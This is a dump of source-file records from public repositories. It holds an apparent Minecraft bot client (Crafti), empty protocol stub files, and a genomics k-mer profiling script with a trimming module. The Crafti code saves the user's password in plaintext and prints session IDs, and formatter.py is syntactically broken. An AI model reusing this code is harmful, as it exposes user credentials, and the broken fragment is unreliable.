minecraft.net says: %s. This normally indicates a fatal error, OH NO!\"%loginResult)\r\n elif \"Old\" in loginResult:\r\n print (\"CRIT: minecraft.net says: &s. This means CharlesBroughton has not yet updated Crafti since Minecraft was last updated. Please wait for an update to be released.\"%loginResult)\r\n else:\r\n print (\"DEBUG: Extracting variables from loginResult...\")\r\n loginResult = loginResult.split(\":\")\r\n cl_version = loginResult[0]\r\n dl_ticket = loginResult[1]\r\n username = loginResult[2]\r\n session_id = loginResult[3]\r\n loggedIn = True\r\n #End of if, elif, else\r\nexcept:\r\n print (\"ERROR: Unable to parse login response, invalid login perhaps?\")\r\n#End of try, except\r\n\r\nif loggedIn:\r\n print (\"DEBUG: cl_version = %s\"%cl_version)\r\n print (\"DEBUG: dl_ticket = %s\"%dl_ticket)\r\n print (\"INFO: Logged in as: %s\"%username)\r\n print (\"DEBUG: session_id = %s\"%session_id)\r\n\r\n print (\"\\n-------------------------------------\\n\")\r\n raw = raw_input(\"Connect to [%s]: \"%server)\r\n if not raw.strip() == \"\":\r\n server = raw.strip()\r\n #End of if\r\n \r\n #SAVE CONFIG\r\n try:\r\n f = open(\"crafti.config\", \"w\")\r\n f.write(\"%s\\n%s\\n%s\\n%s\\n%s\\n%s\"%(username, password, version, automatic, silent, server))\r\n f.close()\r\n except:\r\n print (\"ERROR: Unable to save to crafti.config. Please make sure the file exists, and is writable.\")\r\n #End of try, except\r\n \r\n try:\r\n connect = server.split(\":\")\r\n server = connect[0]\r\n port = connect[1]\r\n except:\r\n port = 25565\r\n #End of try, except\r\n#End of if\r\n\r\nclass Chunk():\r\n def __init__(self, x, z):\r\n self.x = int(x)\r\n self.z = int(z)\r\n\r\n self.blocks = zeros((16, 16, 128), dtype=uint8)\r\n #End of __init__\r\n\r\n def __repr__(self):\r\n return \"Chunk(%d, %d)\" % (self.x, self.z)\r\n #End of __repr__\r\n\r\n __str__ = __repr__\r\n\r\n def load_from_packet(self, packet):\r\n print (\"PACKET: \", packet)\r\n \r\n# array = [chr(i) for i in self.blocks.ravel()]\r\n# array += pack_nibbles(self.metadata)\r\n# array += pack_nibbles(self.skylight)\r\n# array += pack_nibbles(self.blocklight)\r\n# packet = make_packet(\"chunk\", x=self.x * 16, y=0, z=self.z * 16,\r\n# x_size=15, y_size=127, z_size=15, data=\"\".join(array))\r\n# return packet\r\n\r\n def get_block(self, coords):\r\n x, y, z = coords\r\n\r\n return self.blocks[x, z, y]\r\n #End of get_block\r\n\r\n def set_block(self, coords, block):\r\n x, y, z = coords\r\n\r\n if self.blocks[x, z, y] != block:\r\n self.blocks[x, z, y] = block\r\n\r\n for y in range(127, -1, -1):\r\n if self.blocks[x, z, y]:\r\n break\r\n #End of if\r\n #End of for y\r\n #End of if\r\n #End of set_block\r\n \r\nclass MinecraftBot:\r\n def __init__(self, stats):\r\n self.chunk_cache = {}\r\n self.stats = stats\r\n self.counter = 0\r\n #End of __init__\r\n\r\n def init_chunk(self, x, z):\r\n self.chunk_cache[x, z] = Chunk(x, z)\r\n #End of init_chunk\r\n \r\n def nextLoc(self):\r\n pass\r\n #self.location.position.x += 5\r\n #self.protocol.send(make_packet(\"position\", self.location))\r\n #End of nextLoc\r\n \r\n def onPing(self, payload):\r\n self.protocol.send(make_packet(\"ping\"))\r\n #self.counter += 1\r\n #\r\n #if self.counter > 15:\r\n # self.nextLoc()\r\n # self.counter = 13\r\n #End of onPing\r\n \r\n def onHandshake(self, payload):\r\n print (\"DEBUG: Received Handshake packet.\")\r\n print (\"INFO: Asking minecraft.net to join...\")\r\n login = mechanize.Browser()\r\n url = \"http://www.minecraft.net/game/joinserver.jsp?user=\"\r\n url+= username + \"&sessionId=\" + session_id\r\n url+= \"&serverId=\" + payload.username\r\n login.open(url)\r\n \r\n print (\"DEBUG: Sending Login Response packet.\")\r\n self.protocol.send(make_packet(\"login\", {\"protocol\": 8,\r\n \"username\": username,\r\n \"unused\": \"Password\",\r\n \"seed\": 0,\r\n \"dimension\": 0}))\r\n #End of onHandshake\r\n\r\n def onChat(self, payload):\r\n print(\"INFO: Received chat message: %s\"%payload)\r\n #End of onChat\r\n \r\n def onIGNORED(self, payload):\r\n pass\r\n #End of onIGNORED\r\n\r\n def onSpawn(self, payload):\r\n pass\r\n #End of onSpawn\r\n \r\n def onLocation(self, payload):\r\n pass # DEBUGGING\r\n #payload.position.y, payload.position.stance = payload.position.stance, payload.position.y\r\n \r\n #self.location = payload\r\n #self.protocol.send(make_packet(\"location\", self.location))\r\n #End of onLocation\r\n\r\n def onPreChunk(self, payload):\r\n self.init_chunk(payload.x, payload.z)\r\n #End of onPreChunk\r\n \r\n def onBlockUpdate(self, payload):\r\n if (\"blocks_received\") not in self.stats:\r\n self.stats['blocks_received'] = 0\r\n self.stats['blocks_received'] += 1\r\n x = payload.x\r\n y = payload.y\r\n z = payload.z\r\n block = payload.type\r\n xChunk, localX = divmod(x, 16)\r\n zChunk, localZ = divmod(z, 16)\r\n if (xChunk, zChunk) not in self.chunk_cache:\r\n self.init_chunk(xChunk, zChunk)\r\n self.chunk_cache[xChunk, zChunk].set_block({0: localX,1: y,2: localZ}, block)\r\n #End of onBlockUpdate\r\n \r\n def onLargeUpdate(self, payload):\r\n size = (payload.x_size + 1) * (payload.y_size + 1) * (payload.z_size + 1)\r\n blocks = payload.data[:size]\r\n \r\n x, y, z, pointer = payload.x, payload.y, payload.z, 0\r\n while x < payload.x + payload.x_size + 1:\r\n x += 1\r\n xChunk, localX = divmod(x, 16)\r\n while z < payload.z + payload.z_size + 1:\r\n z += 1\r\n zChunk, localZ = divmod(z, 16)\r\n if (xChunk, zChunk) not in self.chunk_cache:\r\n self.init_chunk(xChunk, zChunk)\r\n while y < payload.y + payload.y_size + 1:\r\n y += 1\r\n if (\"blocks_received\") not in self.stats:\r\n self.stats['blocks_received'] = 0\r\n self.stats['blocks_received'] += 1\r\n block = blocks[pointer][0]\r\n block = struct.unpack('B', block)\r\n block = int(block[0])\r\n #if block == 14:\r\n # print (\"== GOLDORE FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 15:\r\n # print (\"== IRONORE FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 16:\r\n # print (\"== COALORE FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 46:\r\n # print (\"== --TNT-- FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 52:\r\n # print (\"== SPAWNER FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 54:\r\n # print (\"== -CHEST- FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 56:\r\n # print (\"== DIAMOND FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 73 or block == 74:\r\n # print (\"== REDSTON FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n self.chunk_cache[xChunk, zChunk].set_block({0: localX, 1: y, 2: localZ}, block)\r\n pointer += 1\r\n y = payload.y\r\n #End while y\r\n z = payload.z\r\n #End while z\r\n x = payload.x\r\n #End while x\r\n #End of onLargeUpdate\r\n \r\n def onNOTIMPLEMENTED(self, payload):\r\n print (\"WARN: Packet not yet implemted! (map data)\")\r\n #End of onNOTIMPLEMENTED\r\n\r\n def onKicked(self, payload):\r\n print (\"ERROR: You were kicked from the server. Reason: %s\"%payload.message)\r\n #End of onKicked\r\n\r\n def sendMessage(self, message):\r\n self.protocol.send(make_packet(\"chat\", {\"message\": message}))\r\n #End of sendMessage\r\n#End of MinecraftBot\r\n\r\nclass MinecraftProtocol(Protocol):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.stats = bot.stats\r\n self.buffer = ''\r\n\r\n self.handlers = {0: self.bot.onPing,\r\n 1: self.bot.onIGNORED, # Login Packet\r\n 2: self.bot.onHandshake,\r\n 3: self.bot.onChat,\r\n 4: self.bot.onIGNORED, # Time Updates\r\n 5: self.bot.onIGNORED, # Equipment update\r\n 6: self.bot.onSpawn,\r\n 13: self.bot.onLocation,\r\n 18: self.bot.onIGNORED, # Arm Animations...\r\n 20: self.bot.onIGNORED, # Player Locations, come back later!\r\n 21: self.bot.onIGNORED, # Entities (?)\r\n 22: self.bot.onIGNORED, # Entities (?)\r\n 23: self.bot.onIGNORED, # Vehicles\r\n 24: self.bot.onIGNORED, # Entities\r\n 28: self.bot.onIGNORED, # Entities\r\n 29: self.bot.onIGNORED, # Entities\r\n 30: self.bot.onIGNORED, # Entities\r\n 31: self.bot.onIGNORED, # Entities\r\n 32: self.bot.onIGNORED, # Entities\r\n 33: self.bot.onIGNORED, # Entities\r\n 34: self.bot.onIGNORED, # Entities\r\n 38: self.bot.onIGNORED, # Unused\r\n 50: self.bot.onPreChunk,\r\n 51: self.bot.onLargeUpdate,\r\n 52: self.bot.onIGNORED, # Multi-Block Updates, come back later!\r\n 53: self.bot.onBlockUpdate,\r\n 103: self.bot.onIGNORED, # Inventory, come back later!\r\n 104: self.bot.onIGNORED, # Inventory, come back later!\r\n 255: self.bot.onKicked\r\n }\r\n #End of __init__\r\n \r\n def dataReceived(self, data):\r\n print (\" We got a packet. \") # DEBUGGING, it appeared stalled.\r\n \r\n self.buffer += data\r\n if (\"data_received\") not in self.stats:\r\n self.stats['data_received'] = 0\r\n self.stats['data_received'] += len(data)\r\n \r\n packets, self.buffer = parse_packets(self.buffer)\r\n\r\n for header, payload in packets:\r\n if (\"packets_received\") not in self.stats:\r\n self.stats['packets_received'] = 0\r\n self.stats['packets_received'] += 1\r\n if header in self.handlers:\r\n self.handlers[header](payload)\r\n else:\r\n print \"Didn't handle parseable packet %d!\"%header\r\n print payload\r\n #End of if, elif, else\r\n #End of for\r\n #End of dataReceived\r\n \r\n def send(self, pkt):\r\n print (\" We sent a packet. \") # DEBUGGING, it appeared stalled.\r\n \r\n self.transport.write(pkt)\r\n if (\"packets_sent\") not in self.stats:\r\n self.stats['packets_sent'] = 0\r\n self.stats['packets_sent'] += 1\r\n if (\"data_sent\") not in self.stats:\r\n self.stats['data_sent'] = 0\r\n self.stats['data_sent'] += len(pkt)\r\n #End of send\r\n \r\n def connectionMade(self):\r\n self.send(make_packet(\"handshake\", {\"username\": username}))\r\n #End of connectionMade\r\n#End of MinecraftProtocol\r\n\r\nclass Connection(ClientFactory):\r\n def __init__(self):\r\n self.stats = {}\r\n self.bot = MinecraftBot(self.stats)\r\n #End of __init__\r\n\r\n def startedConnecting(self, connector):\r\n print (\"DEBUG: startedConnecting...\")\r\n #End of startedConnecting\r\n\r\n def buildProtocol(self, addr):\r\n print (\"INFO: Connected to %s\"%addr)\r\n print (\"DEBUG: Initialising Protocol\")\r\n protocol = MinecraftProtocol(self.bot)\r\n self.bot.protocol = protocol\r\n return protocol\r\n #End of buildProtocol\r\n\r\n def clientConnectionLost(self, connector, reason):\r\n print (\"CRIT: Lost connection. Reason: %s\"%reason)\r\n #End of clientConnectionLost\r\n\r\n def clientConnectionFailed(self, connector, reason):\r\n print (\"CRIT: Connection Failed. Reason: %s\"%reason)\r\n #End of clientConnectionFailed\r\n#End of Connection\r\n\r\nif loggedIn:\r\n print (\"DEBUG: Initialising ClientFactory...\") \r\n class GUI(Frame):\r\n def createWidgets(self):\r\n self.FindOres = Button(self)\r\n self.FindOres['text'] = \"Find Ores\"\r\n self.FindOres['fg'] = \"black\"\r\n self.FindOres['command'] = self.FindOres\r\n \r\n self.FindOres.pack({\"side\": \"left\"})\r\n #End of createWidgets\r\n\r\n def FindOres(self):\r\n pass # NOT YET IMPLEMENTED\r\n #End of FindOres\r\n \r\n def __init__(self, master=None):\r\n Frame.__init__(self, master)\r\n self.pack()\r\n self.createWidgets()\r\n #End of __init__\r\n #End of GUI\r\n\r\n# root = Tk()\r\n# tksupport.install(root)\r\n# app = GUI(master=root)\r\n reactor.connectTCP(server, port, Connection())\r\n reactor.run()\r\nelse:\r\n print (\"CRIT: You never successfully logged in, exiting.\")\r\n#End of if, else\r\n"
},
{
"alpha_fraction": 0.6909090876579285,
"alphanum_fraction": 0.6909090876579285,
"avg_line_length": 17.33333396911621,
"blob_id": "00c0aa25cdb3efca8b7813f67c551dc2f9d94ce7",
"content_id": "af468fa3de2d1a4416f9d14029cc1fc4189a0586",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 3,
"path": "/construct/protocols/application/ftp.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFile Transfer Protocol (TCP/IP protocol stack)\n\"\"\"\n"
},
{
"alpha_fraction": 0.4736842215061188,
"alphanum_fraction": 0.4736842215061188,
"avg_line_length": 5.666666507720947,
"blob_id": "578ac7d6d36d1957e892d02bf94aeaa3ed95988b",
"content_id": "9b675d1d8143c3434b6c0e5c9ed3ad8559e8c72e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 3,
"path": "/construct/protocols/layer3/ipx.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nNovel's IPX\n\"\"\""
},
{
"alpha_fraction": 0.7068965435028076,
"alphanum_fraction": 0.7068965435028076,
"avg_line_length": 18.33333396911621,
"blob_id": "0e70bdac7f7c718e1ed2b43f66c39ccfc7d52b08",
"content_id": "aed55c5cd0fa8f98c73a1c74ac60e0e911fb4f57",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 3,
"path": "/construct/protocols/application/netbios.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nMicrosoft Windows NetBIOS (TCP/IP protocol stack)\n\"\"\"\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 15.333333015441895,
"blob_id": "2ecc4c23509d69f68ba52fa5655983824d1a0d16",
"content_id": "14a81993294c8245324d82f123334797dfcfe858",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 3,
"path": "/construct/formats/filesystem/cdfs.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nISO-9660 Compact Disk file system format\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.3636363744735718,
"alphanum_fraction": 0.4545454680919647,
"avg_line_length": 6.333333492279053,
"blob_id": "d3f1825f476b2437203f34e839e2b8ade3f15d6c",
"content_id": "5dbb3aad8768999ca4d062c48a9627b1a544b09a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 3,
"path": "/construct/formats/filesystem/fat16.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nMS-DOS FAT 16\n\"\"\"\n"
},
{
"alpha_fraction": 0.7169811129570007,
"alphanum_fraction": 0.7169811129570007,
"avg_line_length": 17,
"blob_id": "dbc66c043a79e90a2ccedd931eb0d0e5e9708d29",
"content_id": "0ee2ef130dfc7f1dbaecd1f0369ce2d554a46aed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 3,
"path": "/construct/protocols/application/smtp.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nthe Simple Network Management Protocol (SNMP)\n\"\"\""
},
{
"alpha_fraction": 0.6951219439506531,
"alphanum_fraction": 0.7195122241973877,
"avg_line_length": 19.5,
"blob_id": "ed68b35e245a55063eb961ad4b495b23455b6422",
"content_id": "9e013a948e88f3c2a30181a7f79f3d48a02fc300",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 4,
"path": "/construct/formats/filesystem/fat12.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFile Allocation Table (FAT) / 12 bit version\nUsed primarily for diskettes\n\"\"\"\n"
},
{
"alpha_fraction": 0.6595744490623474,
"alphanum_fraction": 0.6595744490623474,
"avg_line_length": 14.666666984558105,
"blob_id": "d603ab8b5a56893fe6b793f3b03229cb01c90e33",
"content_id": "36988366b6b0edff73f7e7583ec51d71731764d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 47,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 3,
"path": "/construct/protocols/application/irc.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nthe Internet Relay Chat (IRC) protocol\n\"\"\"\n"
},
{
"alpha_fraction": 0.5065458416938782,
"alphanum_fraction": 0.5075528621673584,
"avg_line_length": 24.6842098236084,
"blob_id": "450bee62076ca4c0c2dec6602bd41ec6a7c6c150",
"content_id": "e9e593a620b2c2e715ed62186ef1dcf48ec46923",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 38,
"path": "/construct/lib/formatter.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "from repr import repr as repr2\n\n\ndef recursion_lock(retval, lock_name = \"__recursion_lock__\"):\n def decorator(func):\n def wrapper(self, *args, **kw):\n if getattr(self, lock_name, False):\n return retval\n setattr(self, lock_name, True)\n try:\n return func(self, *args, **kw)\n finally:\n setattr(self, lock_name, False)\n wrapper.__name__ = func.__name__\n return wrapper\n return decorator\n\n\nclass Formatter():\n def __init__(self, obj):\n self.__obj = obj\n self.__locked = False\n def __repr__(self):\n self.__obj\n def __getattr__(self, name):\n return(self.__obj, name)\n\nclass ReprFormatter(object):\n def __init__(self, subobj):\n self.__subobj = subobj\n self.__locked = False\n def __repr__(self):\n pass\n \n \n obj, nesting, indentation = \" \"):\n items = obj.__introspect__()\n return \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5357142686843872,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 8,
"blob_id": "e4dc85edbfd9d1e77808f4cc737061211ade8c46",
"content_id": "caef1d2df5793a46bc9570429f1acdfa82b5d911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 3,
"path": "/construct/protocols/ss7stack.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSS7 Protocol Stack\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.5636363625526428,
"alphanum_fraction": 0.5636363625526428,
"avg_line_length": 17.66666603088379,
"blob_id": "4642d802b285e73c4485d44559b55c9fce91e891",
"content_id": "0b5ad9e750cf2aa3675ef5a20678455eeac00617",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 3,
"path": "/construct/formats/document/__init__.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\ndocument file formats (doc, wri, odf, xls, ...)\n\"\"\""
},
{
"alpha_fraction": 0.6458333134651184,
"alphanum_fraction": 0.6458333134651184,
"avg_line_length": 14.666666984558105,
"blob_id": "f9803ffcae8854a4a29ac9a7428c1665e514ff5a",
"content_id": "73a6ecaa25be1f608e21704f986d5d4d0a028b24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 3,
"path": "/construct/formats/document/pdf.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAbode's Portable Document Format (pdf)\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.6226415038108826,
"alphanum_fraction": 0.6603773832321167,
"avg_line_length": 16.33333396911621,
"blob_id": "76b6497cdff4487684ed19cd0f5887f307d2e677",
"content_id": "c99acc7c4300e7285f7f703e5c4fd24a5c2ce5b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 3,
"path": "/construct/protocols/application/pop3.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nthe Post Office Protocol v3 (POP3) protocol\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.6915887594223022,
"alphanum_fraction": 0.7102803587913513,
"avg_line_length": 25.75,
"blob_id": "0f3a881b5531a24023217df190d0b2d85871c8e2",
"content_id": "42cbe0b84d6a447d112bf31635bc2afbd1066f6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 4,
"path": "/construct/formats/filesystem/fat32.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFile Allocation Table (FAT) / 32 bit version\nUsed for USB flash disks, old MSWindows systems, etc.\n\"\"\"\n"
},
{
"alpha_fraction": 0.6176470518112183,
"alphanum_fraction": 0.6176470518112183,
"avg_line_length": 10,
"blob_id": "3264d527b89b2fbc10b101b53b5d9c8762064347",
"content_id": "c5db3c364128f1da116ff126c9712e31e50fe586",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 34,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 3,
"path": "/construct/protocols/application/tftp.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nthe Trivial FTP protocol\n\"\"\"\n\n"
}
] | 27 |
neavemj/kmer_tools | https://github.com/neavemj/kmer_tools | 3372f57ebbc04cf922da1c681bf791b69f4386d9 | 4967e81902c16046de2dbeca6386b2fbae5f386f | 76f096769994f2ac00c40ba5a3ea392ad887f83a | refs/heads/master | 2020-03-22T06:38:56.276652 | 2018-10-29T03:45:15 | 2018-10-29T03:45:15 | 139,648,232 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6237240433692932,
"alphanum_fraction": 0.6402674913406372,
"avg_line_length": 32.7976188659668,
"blob_id": "82a433f02e1ec4827bbcbe92de626aa344e0d2ea",
"content_id": "1881c8a48fe1ca2ad0f725e1b960bdee9aca770c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2841,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 84,
"path": "/kmer_peak_drawer.py",
"repo_name": "neavemj/kmer_tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n# take raw NGS reads, trim, calc kmer peak, and draw graph\n# Matthew J. Neave 21.06.2018\n\nimport argparse\nimport subprocess # use to pass command line calls\nimport os, sys\nimport pandas as pd\nimport matplotlib\nmatplotlib.use(\"Agg\") # avoids 'no display' error\nimport matplotlib.pyplot as plt\n\nfrom quality_check_trim import trimmer\n\n# argparse to collect command line arguments\n\nparser = argparse.ArgumentParser(\"take raw NGS reads, optionally trim, calculate 31-mer peaks, and produce a \"\n \"graph\\nnote: \"\n \"requires trimmomatic and bbmap to be present on the path\\nnote: requires pandas \"\n \"and matplotlib to be installed in python\\nnote: the bbmap step can use a lot of \"\n \"memory (around 70 Gb for a HiSeq lane)\\n\")\n\nparser.add_argument('-1', '--forward_reads', type = str,\n nargs=1, help = \"fastq forward reads\")\nparser.add_argument('-2', '--reverse_reads', type = str,\n nargs=1, help = \"fastq reverse reads\")\nparser.add_argument(\"-s\", \"--stem\", type =str,\n nargs=1, help = \"a stem name for the output, e.g., sample_405\")\nparser.add_argument('--trim', action = 'store_true',\n help = \"perform trimming with trimmomatic?\")\nparser.add_argument('-t', '--threads', type = str,\n nargs=\"?\", default=\"16\", help = \"threads for trimming and khist [default 16]\")\n\nif len(sys.argv) == 1: # if no args are given\n parser.print_help(sys.stderr)\n sys.exit(1)\n\nargs = parser.parse_args()\n\n# check required arguments are provided\n\nif args.forward_reads is None or args.reverse_reads is None or args.stem is None:\n print(\"\\n~~~ required output is missing ~~~\\n\"\n \"~~~ forward reads, reverse reads, and an output stem for file names are required ~~~\\n\")\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n# check that bbmap is loaded\n\ntry:\n tmp = subprocess.call([\"khist.sh\", \"-version\"])\nexcept OSError as e:\n if e.errno == os.errno.ENOENT:\n print(\"\\nkhist could not be found: try 'module load bbmap'\\n\")\n raise\n\n# grab stem name of files for later\n\nstem = args.stem[0]\n\nif args.trim:\n F_read, R_read = trimmer(args, stem)\nelse:\n F_read = args.forward_reads[0]\n R_read = args.reverse_reads[0]\n\n# now use bbmap's khist to draw kmer profile\n\nprint(\"~~~ beginning kmer profile with bbmap ~~~\")\n\nsubprocess.call([\"khist.sh\", \"in=\" + F_read, \"in2=\" + R_read, \"khist=\" + stem + \".khist.txt\", \"threads=\" + args.threads,\n \"k=31\"])\n\n# create a quick graph from the khist file\n# zoom is set to usually work (but might not always)\n\nprint(\"~~~ drawing kmer figure ~~~\")\n\nkhist = pd.read_csv(stem + \".khist.txt\", sep=\"\\t\")\n\nkhist.plot(x=\"#Depth\", y=\"Unique_Kmers\", xlim=[0, 80000], ylim=[0, 1000])\n\nplt.savefig(stem + \".khist.png\", dpi=300)\n\n\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 31.5,
"blob_id": "d58250f7d660e1a42a888713c82da97fffbcc775",
"content_id": "f132f214b7a683c3a1e3479cebba54bb7e5aea2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 65,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 2,
"path": "/README.md",
"repo_name": "neavemj/kmer_tools",
"src_encoding": "UTF-8",
"text": "# kmer_tools\nSet of utilities for analysing kmer profiles in NGS\n"
},
{
"alpha_fraction": 0.6026595830917358,
"alphanum_fraction": 0.6218085289001465,
"avg_line_length": 36.599998474121094,
"blob_id": "0890d54e14fedab00818dfd2910fa9d4e5c21de7",
"content_id": "4bb0cc5feadd329eeb5e6e834642487a11f7d4a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1880,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 50,
"path": "/quality_check_trim.py",
"repo_name": "neavemj/kmer_tools",
"src_encoding": "UTF-8",
"text": "# module to trim Illumina reads as part of kmer profiling\n# Matthew J. Neave 04.07.2018\n\nimport subprocess\nimport os\n\ndef trimmer(args, stem):\n\n \"\"\"\n uses trimmomatic to trim fastq Illumina reads (paired end)\n adapters will be detected in the default CSIRO location\n :param args: argparse object used to grab the F and R reads\n :param stem: stem of the filename used for output file naming\n :return: returns the names of the F and R trimmed files\n :raise: errors will be raised if the adapters can't be found or\n if trimmomatic is not available on the path\n \"\"\"\n # first check that the adapters are accessible\n try:\n adapter_fl = open(\"/apps/trimmomatic/0.36/adapters/TruSeq3-PE-2.fa\")\n adapter_path = \"/apps/trimmomatic/0.36/adapters/TruSeq3-PE-2.fa\"\n print(\"~~~ found adapter files ~~~\")\n except:\n print(\"\\n~~~ could not find adapter file for trimmomatic! ~~~\\n\")\n raise\n\n # check that modules have been loaded\n try:\n subprocess.call([\"trimmomatic\", \"-version\"])\n except OSError as e:\n if e.errno == os.errno.ENOENT:\n print(\"\\ntrimmomatic could not be found: try 'module load trimmomatic'\\n\")\n raise\n\n # create output file names from the stem\n\n F_paired = stem + \"_1P.fastq.gz\"\n F_unpaired = stem + \"_1U.fastq.gz\"\n R_paired = stem + \"_2P.fastq.gz\"\n R_unpaired = stem + \"_2U.fastq.gz\"\n\n ## TRIM READS ##\n print(\"~~~ beginning trimming with trimmomatic ~~~\")\n\n subprocess.check_output([\"trimmomatic\", \"PE\", \"-threads\", args.threads, args.forward_reads[0],\n args.reverse_reads[0], F_paired, F_unpaired, R_paired, R_unpaired, \"ILLUMINACLIP:\" +\n adapter_path +\n \":2:30:10\", \"LEADING:3\", \"TRAILING:3\", \"SLIDINGWINDOW:4:20\", \"MINLEN:50\"])\n\n return(F_paired, R_paired)\n"
}
] | 3 |
loganrobinson315/web-scraper | https://github.com/loganrobinson315/web-scraper | d2614e33757fbb8adf2595aaec19d774b0f74b49 | 6cf95dcf976960e4be18d8eee3537de19063e6da | 4f247536995833c9b0800c169b3f01990e987372 | refs/heads/master | 2023-05-01T01:04:10.681183 | 2021-05-17T13:51:17 | 2021-05-17T13:51:17 | 368,201,474 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7853773832321167,
"alphanum_fraction": 0.7900943160057068,
"avg_line_length": 55.599998474121094,
"blob_id": "0c813af4846c43908f937288ecf2f7e8b95c6ca7",
"content_id": "6a16f7831ebc78ef541cd74eee12ccda966964fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 848,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 15,
"path": "/README.txt",
"repo_name": "loganrobinson315/web-scraper",
"src_encoding": "UTF-8",
